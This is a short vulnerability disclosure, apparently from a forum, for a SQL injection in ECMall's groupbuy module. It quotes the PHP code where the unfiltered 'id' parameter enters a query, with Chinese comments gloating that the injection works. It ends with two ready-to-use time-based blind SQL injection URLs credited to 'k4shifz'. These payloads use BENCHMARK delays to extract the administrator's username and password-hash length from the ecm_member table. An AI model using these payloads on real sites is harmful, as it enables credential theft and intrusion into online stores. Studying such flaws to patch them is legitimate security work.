app\groupbuy.app.php:26:

 

  1. function index()  
  2.     {  
  3.         $id = empty($_GET['id']) ? 0 : $_GET['id'];  //id未过滤  
  4.         if (!$id)  
  5.         {  
  6.             $this->show_warning('no_such_groupbuy');   
  7.             return false;  
  8.         }  
  9.         // 团购信息  
  10.         $group = $this->_groupbuy_mod->get(array(  
  11.             'conditions' => 'group_id=' . $id . ' AND gb.state<>' . GROUP_PENDING,   //好的,进去了!!  
  12.             'join' => 'belong_store',  
  13.             'fields' => 'gb.*,s.owner_name'  
  14.         ));  
  15.  
  16.         if (empty($group))    //很多时候根本没有团购信息,所以是延迟注射了  
  17.         {  
  18.             $this->show_warning('no_such_groupbuy');  
  19.             return;  
  20.         } 

 

exp by k4shifz:

/index.php?app=groupbuy&act=index&id=2 and if((select ascii(mid(user_name,1,1)) from ecm_member where user_id=1)=97,Benchmark(3000000,md5(1)),1)%23
/index.php?app=groupbuy&act=index&id=2%20and%20if((select%20length(password)%20from%20ecm_member%20where%20user_id=1)=32,benchmark(1000000,md5(1)),1)--